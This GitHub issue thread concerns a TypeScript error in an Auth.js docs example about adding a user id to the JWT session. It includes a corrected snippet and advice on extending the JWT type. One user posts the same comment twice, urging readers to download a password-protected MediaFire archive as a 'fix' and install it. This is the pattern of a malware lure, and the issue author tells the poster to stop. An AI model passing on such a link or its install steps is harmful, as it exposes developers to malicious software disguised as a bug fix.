### ISSUE TITLE
Docs: Bug in code example

### ISSUE THREAD

**Issue by Jay-Karia** [nextauthjs/next-auth#11682]
### What is the improvement or update you wish to see?

The code examples listed here: https://authjs.dev/guides/extending-the-session#with-jwt
as a Typescript error.

![code_bug](https://github.com/user-attachments/assets/c8629e98-3b27-4cdf-ae3d-42b68ad37288)

### Is there any context that might help us understand?

The code should be updated to:
```ts
 callbacks: {
    jwt({ token, user }) {
      if (user) {
        token.id = user.id;
      }
      return token;
    },
    session({ session, token }) {
      if (session.user) {
        session.user.id = token.id as string; // add "as string"
      }
      return session;
    },
  },
```

### Does the docs page already exist? Please link to it.

https://authjs.dev/guides/extending-the-session#with-jwt

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Jay-Karia** [comment]
@amir1387aht 
Stop this

**Comment by halvaradop** [comment]
To remove these errors and enable autocompletion for the properties, you need to extend the `JWT` type in your project. For more information on how to do this, [read more here](https://authjs.dev/getting-started/typescript). The default values for these types are:

```ts
interface JWT  {
  name?: string | null
  email?: string | null
  picture?: string | null
  sub?: string
  iat?: number
  exp?: number
  jti?: string
}
```
For this reason, the `id` property is unknown and shows as not assignable to type `string`.

**Comment by Jay-Karia** [comment]
IMO, this should be mentioned in the docs

**Comment by balazsorban44** [comment]
Simply linking to https://authjs.dev/getting-started/typescript should be sufficient

**Comment by halvaradop** [comment]
Currently, there is a link that navigates to the TypeScript docs, or your idea would be to add a link in the base description ?
